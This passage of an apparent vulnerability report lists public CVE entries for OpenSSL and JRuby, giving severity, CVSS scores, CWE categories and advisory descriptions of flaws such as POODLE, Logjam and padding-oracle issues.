CVE-2016-2108  

Severity: High
CVSS Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The ASN.1 implementation in OpenSSL before 1.0.1o and 1.0.2 before 1.0.2c allows remote attackers to execute arbitrary code or cause a denial of service (buffer underflow and memory corruption) via an ANY field in crafted serialized data, aka the "negative zero" issue.

Vulnerable Software & Versions: (show all)

CVE-2016-2107  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session, NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.

Vulnerable Software & Versions: (show all)

CVE-2016-2106  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncryptUpdate function in crypto/evp/evp_enc.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of data.

Vulnerable Software & Versions: (show all)

CVE-2016-2105  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-189 Numeric Errors

Integer overflow in the EVP_EncodeUpdate function in crypto/evp/encode.c in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h allows remote attackers to cause a denial of service (heap memory corruption) via a large amount of binary data.

Vulnerable Software & Versions: (show all)

CVE-2016-0704  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

An oracle protection mechanism in the get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a overwrites incorrect MASTER-KEY bytes during use of export cipher suites, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions: (show all)

CVE-2016-0703  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a related issue to CVE-2016-0800.

Vulnerable Software & Versions: (show all)

CVE-2015-4000  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.2 and earlier, when a DHE_EXPORT ciphersuite is enabled on a server but not on a client, does not properly convey a DHE_EXPORT choice, which allows man-in-the-middle attackers to conduct cipher-downgrade attacks by rewriting a ClientHello with DHE replaced by DHE_EXPORT and then rewriting a ServerHello with DHE_EXPORT replaced by DHE, aka the "Logjam" issue.

Vulnerable Software & Versions: (show all)

CVE-2015-1792  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The do_free_upto function in crypto/cms/cms_smime.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (infinite loop) via vectors that trigger a NULL value of a BIO data structure, as demonstrated by an unrecognized X.660 OID for a hash function.

Vulnerable Software & Versions: (show all)

CVE-2015-1791  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_get_new_session_ticket function in ssl/s3_clnt.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b, when used for a multi-threaded client, allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact by providing a NewSessionTicket during an attempt to reuse a ticket that had been obtained earlier.

Vulnerable Software & Versions: (show all)

CVE-2015-1790  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS7_dataDecodefunction in crypto/pkcs7/pk7_doit.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a PKCS#7 blob that uses ASN.1 encoding and lacks inner EncryptedContent data.

Vulnerable Software & Versions: (show all)

CVE-2015-1789  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The X509_cmp_time function in crypto/x509/x509_vfy.c in OpenSSL before 0.9.8zg, 1.0.0 before 1.0.0s, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted length field in ASN1_TIME data, as demonstrated by an attack against a server that supports client authentication with a custom verification callback.

Vulnerable Software & Versions: (show all)

CVE-2015-1788  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The BN_GF2m_mod_inv function in crypto/bn/bn_gf2m.c in OpenSSL before 0.9.8s, 1.0.0 before 1.0.0e, 1.0.1 before 1.0.1n, and 1.0.2 before 1.0.2b does not properly handle ECParameters structures in which the curve is over a malformed binary polynomial field, which allows remote attackers to cause a denial of service (infinite loop) via a session that uses an Elliptic Curve algorithm, as demonstrated by an attack against a server that supports client authentication.

Vulnerable Software & Versions: (show all)

CVE-2015-1787  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The ssl3_get_client_key_exchange function in s3_srvr.c in OpenSSL 1.0.2 before 1.0.2a, when client authentication and an ephemeral Diffie-Hellman ciphersuite are enabled, allows remote attackers to cause a denial of service (daemon crash) via a ClientKeyExchange message with a length of zero.

Vulnerable Software & Versions:

CVE-2015-0293  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The SSLv2 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (s2_lib.c assertion failure and daemon exit) via a crafted CLIENT-MASTER-KEY message.

Vulnerable Software & Versions: (show all)

CVE-2015-0292  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Integer underflow in the EVP_DecodeUpdate function in crypto/evp/encode.c in the base64-decoding implementation in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted base64 data that triggers a buffer overflow.

Vulnerable Software & Versions: (show all)

CVE-2015-0291  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The sigalgs implementation in t1_lib.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) by using an invalid signature_algorithms extension in the ClientHello message during a renegotiation.

Vulnerable Software & Versions:

CVE-2015-0290  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The multi-block feature in the ssl3_write_bytes function in s3_pkt.c in OpenSSL 1.0.2 before 1.0.2a on 64-bit x86 platforms with AES NI support does not properly handle certain non-blocking I/O cases, which allows remote attackers to cause a denial of service (pointer corruption and application crash) via unspecified vectors.

Vulnerable Software & Versions:

CVE-2015-0289  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c.

Vulnerable Software & Versions: (show all)

CVE-2015-0288  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The X509_to_X509_REQ function in crypto/x509/x509_req.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow attackers to cause a denial of service (NULL pointer dereference and application crash) via an invalid certificate key.

Vulnerable Software & Versions: (show all)

CVE-2015-0287  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_item_ex_d2i function in crypto/asn1/tasn_dec.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not reinitialize CHOICE and ADB data structures, which might allow attackers to cause a denial of service (invalid write operation and memory corruption) by leveraging an application that relies on ASN.1 structure reuse.

Vulnerable Software & Versions: (show all)

CVE-2015-0286  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-17 Code

The ASN1_TYPE_cmp function in crypto/asn1/a_type.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly perform boolean-type comparisons, which allows remote attackers to cause a denial of service (invalid read operation and application crash) via a crafted X.509 certificate to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions: (show all)

CVE-2015-0285  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_client_hello function in s3_clnt.c in OpenSSL 1.0.2 before 1.0.2a does not ensure that the PRNG is seeded before proceeding with a handshake, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by sniffing the network and then conducting a brute-force attack.

Vulnerable Software & Versions:

CVE-2015-0209  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)

Use-after-free vulnerability in the d2i_ECPrivateKey function in crypto/ec/ec_asn1.c in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a might allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a malformed Elliptic Curve (EC) private-key file that is improperly handled during import.

Vulnerable Software & Versions: (show all)

CVE-2015-0208  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ASN.1 signature-verification implementation in the rsa_item_verify function in crypto/rsa/rsa_ameth.c in OpenSSL 1.0.2 before 1.0.2a allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via crafted RSA PSS parameters to an endpoint that uses the certificate-verification feature.

Vulnerable Software & Versions:

CVE-2015-0207  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

The dtls1_listen function in d1_lib.c in OpenSSL 1.0.2 before 1.0.2a does not properly isolate the state information of independent data streams, which allows remote attackers to cause a denial of service (application crash) via crafted DTLS traffic, as demonstrated by DTLS 1.0 traffic to a DTLS 1.2 server.

Vulnerable Software & Versions:

CVE-2015-0204  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the "FREAK" issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations.

Vulnerable Software & Versions: (show all)

CVE-2014-8275  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c.

Vulnerable Software & Versions: (show all)

CVE-2014-8176  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_clear_queues function in ssl/d1_lib.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h frees data structures without considering that application data can arrive between a ChangeCipherSpec message and a Finished message, which allows remote DTLS peers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via unexpected application data.

Vulnerable Software & Versions: (show all)

CVE-2014-3572  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message.

Vulnerable Software & Versions: (show all)

CVE-2014-3571  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)

OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c.

Vulnerable Software & Versions: (show all)

CVE-2014-3570  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c.

Vulnerable Software & Versions: (show all)

CVE-2014-3568  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j does not properly enforce the no-ssl3 build option, which allows remote attackers to bypass intended access restrictions via an SSL 3.0 handshake, related to s23_clnt.c and s23_srvr.c.

Vulnerable Software & Versions: (show all)

CVE-2014-3567  

Severity: High
CVSS Score: 7.1 (AV:N/AC:M/Au:N/C:N/I:N/A:C)
CWE: CWE-399 Resource Management Errors

Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure.

Vulnerable Software & Versions: (show all)

CVE-2014-3566  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the "POODLE" issue.

Vulnerable Software & Versions: (show all)

CVE-2014-3470  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)

The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value.

Vulnerable Software & Versions: (show all)

CVE-2014-0224  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the "CCS Injection" vulnerability.

Vulnerable Software & Versions: (show all)

CVE-2014-0221  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake.

Vulnerable Software & Versions: (show all)

CVE-2014-0195  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment.

Vulnerable Software & Versions: (show all)

CVE-2014-0076  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack.

Vulnerable Software & Versions: (show all)

CVE-2013-6449  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client.

Vulnerable Software & Versions: (show all)

CVE-2013-0169  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

Vulnerable Software & Versions: (show all)

CVE-2012-5370  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-310 Cryptographic Issues

JRuby computes hash values without properly restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table, as demonstrated by a universal multicollision attack against the MurmurHash2 algorithm, a different vulnerability than CVE-2011-4838.

Vulnerable Software & Versions:

CVE-2012-2333  

Severity: Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-189 Numeric Errors

Integer underflow in OpenSSL before 0.9.8x, 1.0.0 before 1.0.0j, and 1.0.1 before 1.0.1c, when TLS 1.1, TLS 1.2, or DTLS is used with CBC encryption, allows remote attackers to cause a denial of service (buffer over-read) or possibly have unspecified other impact via a crafted TLS packet that is not properly handled during a certain explicit IV calculation.

Vulnerable Software & Versions: (show all)

CVE-2012-2110  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key.

Vulnerable Software & Versions: (show all)

CVE-2012-1165  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The mime_param_cmp function in crypto/asn1/asn_mime.c in OpenSSL before 0.9.8u and 1.x before 1.0.0h allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted S/MIME message, a different vulnerability than CVE-2006-7250.

Vulnerable Software & Versions: (show all)

CVE-2012-0884  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The implementation of Cryptographic Message Syntax (CMS) and PKCS #7 in OpenSSL before 0.9.8u and 1.x before 1.0.0h does not properly restrict certain oracle behavior, which makes it easier for context-dependent attackers to decrypt data via a Million Message Attack (MMA) adaptive chosen ciphertext attack.

Vulnerable Software & Versions: (show all)

CVE-2012-0027  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service (daemon crash) via crafted data from a TLS client.

Vulnerable Software & Versions: (show all)

CVE-2011-4838  

Severity: High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.

Vulnerable Software & Versions: (show all)

CVE-2011-4619  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

The Server Gated Cryptography (SGC) implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors.

Vulnerable Software & Versions: (show all)

CVE-2011-4577  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

OpenSSL before 0.9.8s and 1.x before 1.0.0f, when RFC 3779 support is enabled, allows remote attackers to cause a denial of service (assertion failure) via an X.509 certificate containing certificate-extension data associated with (1) IP address blocks or (2) Autonomous System (AS) identifiers.

Vulnerable Software & Versions: (show all)

CVE-2011-4576  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer.

Vulnerable Software & Versions: (show all)

CVE-2011-4354  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

crypto/bn/bn_nist.c in OpenSSL before 0.9.8h on 32-bit platforms, as used in stunnel and other products, in certain circumstances involving ECDH or ECDHE cipher suites, uses an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves, which allows remote attackers to obtain the private key of a TLS server via multiple handshake attempts.

Vulnerable Software & Versions: (show all)

CVE-2011-4108  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack.

Vulnerable Software & Versions: (show all)

CVE-2011-1945  

Severity: Low
CVSS Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
CWE: CWE-310 Cryptographic Issues

The elliptic curve cryptography (ECC) subsystem in OpenSSL 1.0.0d and earlier, when the Elliptic Curve Digital Signature Algorithm (ECDSA) is used for the ECDHE_ECDSA cipher suite, does not properly implement curves over binary fields, which makes it easier for context-dependent attackers to determine private keys via a timing attack and a lattice calculation.

Vulnerable Software & Versions: (show all)

CVE-2011-1473  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

** DISPUTED ** OpenSSL before 0.9.8l, and 0.9.8m through 1.x, does not properly restrict client-initiated renegotiation within the SSL and TLS protocols, which might make it easier for remote attackers to cause a denial of service (CPU consumption) by performing many renegotiations within a single connection, a different vulnerability than CVE-2011-5094. NOTE: it can also be argued that it is the responsibility of server deployments, not a security library, to prevent or limit renegotiation when it is inappropriate within a specific environment.

Vulnerable Software & Versions: (show all)

CVE-2010-5298  

Severity: Medium
CVSS Score: 4.0 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment.

Vulnerable Software & Versions: (show all)

CVE-2010-4252  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-287 Improper Authentication

OpenSSL before 1.0.0c, when J-PAKE is enabled, does not properly validate the public parameters in the J-PAKE protocol, which allows remote attackers to bypass the need for knowledge of the shared secret, and successfully authenticate, by sending crafted values in each round of the protocol.

Vulnerable Software & Versions: (show all)

CVE-2010-4180  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)

OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier.

Vulnerable Software & Versions: (show all)

CVE-2010-1330  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The regular expression engine in JRuby before 1.4.1, when $KCODE is set to 'u', does not properly handle characters immediately after a UTF-8 character, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted string.

Vulnerable Software & Versions: (show all)

CVE-2010-0742  

Severity: High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors.

Vulnerable Software & Versions: (show all)

CVE-2010-0433  

Severity: Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
CWE: CWE-20 Improper Input Validation

The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.

Vulnerable Software & Versions: (show all)

CVE-2009-4355  

Severity: Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.

Vulnerable Software & Versions: (show all)

CVE-2009-3555  

Severity: Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P)
CWE: CWE-310 Cryptographic Issues

